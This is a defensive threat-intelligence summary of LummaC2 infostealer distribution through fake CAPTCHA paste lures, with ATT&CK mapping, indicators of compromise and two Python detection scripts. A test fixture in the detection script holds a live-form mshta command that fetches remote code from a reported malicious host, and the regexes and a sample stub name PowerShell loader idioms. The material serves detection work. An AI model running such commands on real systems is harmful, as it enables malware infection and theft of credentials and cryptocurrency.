Full Report
AhnLab SEcurity intelligence Center (ASEC) previously introduced the DarkGate malware, which spreads by having the victim paste a command from the clipboard, in the blog post "Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V)". The distribution method in that case initially involved spreading malware through HTML attachments disguised as MS Word files in phishing emails. However, LummaC2 has […]
Analysis Summary
# Tool/Technique: LummaC2
## Overview
LummaC2 is an infostealer malware capable of stealing sensitive information such as browser data and cryptocurrencies. It is currently being distributed via phishing campaigns and fake CAPTCHA verification pages.
## Technical Details
- Type: Malware family
- Platform: Windows (implied by use of `mshta.exe` and PowerShell)
- Capabilities: Information theft (browser data, cryptocurrencies), clipboard monitoring/modification (ClipBanker module).
- First Seen: The fake CAPTCHA distribution is the newly reported vector; LummaC2 itself was previously documented being distributed disguised as illegal cracks.
## MITRE ATT&CK Mapping
The observed distribution and execution chain maps to the following techniques:
- **TA0001 - Initial Access**
  - T1566 - Phishing (phishing campaigns and fake CAPTCHA verification pages are the reported lures)
  - T1566.001 - Spearphishing Attachment (HTML attachments disguised as MS Word files, the earlier vector noted in the report)
- **TA0002 - Execution**
  - T1204 - User Execution (the victim pastes and runs the command the fake CAPTCHA page placed in the clipboard)
  - T1059.001 - Command and Scripting Interpreter: PowerShell (the loader stage and the final `web.png` script)
  - T1059.005 - Command and Scripting Interpreter: Visual Basic (script embedded in the HTA content)
- **TA0005 - Defense Evasion**
  - T1218.005 - System Binary Proxy Execution: Mshta (`mshta.exe` fetches and runs the remote HTA)
  - T1027 - Obfuscated Files or Information (obfuscated HTA content, AES-encrypted PowerShell payload run in memory)
  - T1036.008 - Masquerading: Masquerade File Type (HTA served as `web44.mp4`, PowerShell script served as `web.png`)
- **TA0009 - Collection**
  - T1115 - Clipboard Data (the ClipBanker module monitors and rewrites clipboard content)
  - T1555.003 - Credentials from Password Stores: Credentials from Web Browsers (theft of data stored in browsers)
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer (`web44.mp4` and `web.png` downloaded from attacker-controlled hosts)
  - T1071.001 - Application Layer Protocol: Web Protocols (HTTPS C2 at `noisercluch[.]click/api`)
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel (implied: stolen data is reported to the C2 together with the `hwid`, `pid` and `lid` identifiers)
## Functionality
### Core Capabilities
- Stealing information stored in web browsers.
- Stealing cryptocurrency wallet data.
- Utilizing a PowerShell script loader for execution.
### Advanced Features
- **ClipBanker Module:** Monitors the clipboard and replaces discovered cryptocurrency wallet addresses with the threat actor's controlled wallet address.
- **Chain Execution:** Involves multiple stages: Fake CAPTCHA -> command placed in the clipboard and pasted by the victim -> `mshta.exe` execution of an obfuscated HTA file served with a misleading `.mp4` extension (`web44.mp4`) -> AES-encrypted PowerShell script decrypted and run in memory -> download and execution of the final PowerShell script (`web.png`) -> LummaC2 execution.
- **C2 Communication:** Uses unique identifiers (`hwid`, `pid`, `lid`) to track infected systems and data types being harvested.
## Indicators of Compromise
- File Hashes:
- MD5: `3099830291f5dfb199b1f6649997fb45`, `3734e365ab10e73a85320916ba49c3ee`, `af46bc7df8441c09296666f0053fb000`, `e7677ec2ca8706708bcd64b7b8e7111d`
- File Names: `web44.mp4` (HTA file), `web.png` (PowerShell script)
- Registry Keys: Not explicitly listed.
- Network Indicators:
- `https://cc[.]klipjaqemiu[.]shop/web[.]png`
- `https://klipjaqemiu[.]shop/web44[.]mp4`
- `https://noisercluch[.]click/api`
- Behavioral Indicators:
- Execution via `mshta.exe` loading suspicious external files.
- Use of obfuscated HTA files that secretly contain HTML/script content.
- In-memory execution of AES-encrypted PowerShell scripts.
- Clipboard monitoring and modification (ClipBanker activity).
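The behavioural indicators above hinge on files whose extension claims media while the bytes carry HTA or PowerShell content. The checker below is an added example for this summary, not code from ASEC or from the malware: it compares a file's magic bytes against its extension and scans the bytes for the script markers `mshta.exe` and PowerShell would act on. The `SAMPLES` byte strings are constructed stand-ins for `web44.mp4` and `web.png`, not the real payloads, and the function names are the author's own.

```python
"""Check whether a file delivers what its extension claims.

Added example for this summary, not code from ASEC or from LummaC2.  The
byte strings in SAMPLES are constructed stand-ins for the report's
web44.mp4 (HTA) and web.png (PowerShell), not the real payloads.
"""
import os
import re

# Extensions the campaign abused.  A genuine PNG starts with a fixed
# 8-byte signature; a genuine ISO BMFF (.mp4) file has 'ftyp' at offset 4.
PNG_SIG = b"\x89PNG\r\n\x1a\n"
MEDIA_EXTS = {".mp4", ".png"}

# Content mshta.exe will render even when buried in junk bytes: it ignores
# the extension and parses whatever HTML/HTA markup it finds in the file.
HTA_MARKERS = re.compile(rb"<\s*(hta:application|html|head|body|script)\b", re.I)

# PowerShell loader idioms.  Two or more hits are treated as script rather
# than an accidental substring inside binary data.
PS_MARKERS = re.compile(
    rb"(Invoke-Expression|\bIEX\b|FromBase64String"
    rb"|\[System\.Security\.Cryptography\.Aes\w*\]|Invoke-WebRequest|\$\w+\s*=)",
    re.I,
)


def magic_matches(ext, data):
    """True when the leading bytes are consistent with the claimed media type."""
    if ext == ".png":
        return data.startswith(PNG_SIG)
    if ext == ".mp4":
        return data[4:8] == b"ftyp"
    return True  # not an extension this checker knows how to verify


def sniff_script(data):
    """Return 'hta', 'powershell' or None based on content markers."""
    if HTA_MARKERS.search(data):
        return "hta"
    if len(PS_MARKERS.findall(data)) >= 2:
        return "powershell"
    return None


def classify(name, data):
    """Verdict for one file: a media extension over script content, or over
    bytes that are not that media type, is flagged as suspicious."""
    ext = os.path.splitext(name)[1].lower()
    magic_ok = magic_matches(ext, data)
    script = sniff_script(data)
    return {
        "name": name,
        "magic_ok": magic_ok,
        "script": script,
        "suspicious": ext in MEDIA_EXTS and (not magic_ok or script is not None),
    }


# Constructed samples: two masquerades in the style the report describes,
# and two files that really are what their extension says.
SAMPLES = {
    "web44.mp4": b"\x13\x37" * 16 + b"<html><head><hta:application id=\"x\"></head>"
                 b"<body><script language=\"vbscript\">' obfuscated HTA stand-in</script></body></html>",
    "web.png": b"$k=[Convert]::FromBase64String('Zm9v');"
               b"$a=[System.Security.Cryptography.Aes]::Create();IEX($d)",
    "clip.mp4": b"\x00\x00\x00\x18ftypmp42" + b"\x00" * 24,
    "logo.png": PNG_SIG + b"\x00\x00\x00\rIHDR" + b"\x00" * 16,
}


def scan_all(samples=SAMPLES):
    """Classify every sample; returns {name: verdict}."""
    return {name: classify(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for verdict in scan_all().values():
        print(verdict)
```

The two checks are deliberately independent: a file with a valid PNG signature followed by PowerShell text (a polyglot) fails the content check even though its magic bytes are correct, while a file with no script markers but the wrong magic is still flagged, so the checker does not rely on the attacker leaving either tell in place.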
## Associated Threat Actors
The specific threat actor group is not named. The report notes that LummaC2 was previously distributed disguised as illegal cracks, which points to opportunistic actors targeting the general public, particularly users seeking pirated software, rather than a specific sector.
## Detection Methods
- Signature-based detection: Scan files against the MD5 hashes listed above and block the listed domains.
- Behavioral detection: Alert on `mshta.exe` launched with a URL argument, especially one whose path ends in a non-HTA extension such as `.mp4`; on PowerShell spawned by `mshta.exe`; and on PowerShell that decrypts and runs script content in memory rather than from a file on disk. On the user side, clipboard contents that turn into a command line right after a web page asked for a CAPTCHA step, and wallet addresses that differ between copy and paste, are the signs of the paste lure and of ClipBanker respectively.
- YARA rules: Not provided in the context.
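To show the behavioural detection as something that can be run over telemetry, the following is an added example (not ASEC's code) that applies two rules to process-creation events: `mshta.exe` given a remote URL, with extra tags when the URL path is not an HTA file or the host is one of the report's network indicators, and PowerShell spawned by `mshta.exe`. The event records use Sysmon Event ID 1-style field names but are constructed for this example; the PowerShell command line in the second event is a placeholder, and the rule and function names are the author's own.

```python
"""Run process-creation telemetry through rules matching the
fake CAPTCHA -> mshta.exe -> PowerShell chain.

Added example, not ASEC's code.  EVENTS is constructed (Sysmon Event ID 1
style field names); the PowerShell command line is a placeholder.
"""
import re
from urllib.parse import urlparse

# Network IoCs from the report, kept defanged in source and refanged only
# for matching against real command lines.
IOC_HOSTS = {
    h.replace("[.]", ".")
    for h in ("cc[.]klipjaqemiu[.]shop", "klipjaqemiu[.]shop", "noisercluch[.]click")
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
HTA_EXTS = (".hta", ".htm", ".html")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_mshta_remote(ev):
    """mshta.exe handed a URL: it will fetch and run remote HTA/script content."""
    if basename(ev["Image"]) != "mshta.exe":
        return []
    tags = []
    for url in URL_RE.findall(ev["CommandLine"]):
        u = urlparse(url)
        tags.append("mshta_remote_url")
        if not u.path.lower().endswith(HTA_EXTS):
            tags.append("mshta_non_hta_extension")  # e.g. /web44.mp4
        if u.hostname in IOC_HOSTS:
            tags.append("known_ioc_host")
    return tags


def rule_mshta_child(ev):
    """A shell spawned by mshta.exe: the HTA handing off to the PowerShell loader."""
    if basename(ev["ParentImage"]) == "mshta.exe" and basename(ev["Image"]) in SHELLS:
        return ["powershell_from_mshta"]
    return []


RULES = (rule_mshta_remote, rule_mshta_child)


def detect(events):
    """Return one alert per event that any rule tagged."""
    alerts = []
    for ev in events:
        tags = [t for rule in RULES for t in rule(ev)]
        if tags:
            alerts.append({
                "ProcessId": ev["ProcessId"],
                "Image": basename(ev["Image"]),
                "tags": sorted(set(tags)),
            })
    return alerts


# Constructed telemetry: two events from the reported chain, two benign ones.
EVENTS = [
    {"ProcessId": 4312, "ParentProcessId": 1120,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://klipjaqemiu.shop/web44.mp4"},
    {"ProcessId": 4388, "ParentProcessId": 4312,
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "<placeholder>"'},
    {"ProcessId": 5002, "ParentProcessId": 2200,
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"ProcessId": 5100, "ParentProcessId": 3000,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The first rule fires on the URL alone, so it still catches the chain when the attacker rotates hosts and the IoC match adds nothing; the IoC tag is there to raise priority, not to gate the alert. A locally installed HTA launched by an installer (the third event) produces no alert, which keeps the rule usable in environments that legitimately run `mshta.exe`.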
## Mitigation Strategies
- Users should exercise extreme caution with emails and websites of unclear origin, especially those prompting authentication or interactions on non-standard pages (like fake CAPTCHAs).
- Implement robust email and web filtering to block access to known malicious domains.
- Disable or restrict the script hosts used in the chain (`mshta.exe`, PowerShell) where appropriate, or enforce application control policies that block `mshta.exe` from running remote content.
- Educate users about social engineering tactics, in particular pages that ask them to paste (CTRL+V) and run a command the page itself placed in the clipboard.
## Related Tools/Techniques
- DarkGate (Previously analyzed by ASEC; distributed through the same paste (CTRL+V) command-execution lure.)
- LummaC2 (The ultimate payload; detailed analysis exists in a separate linked article.)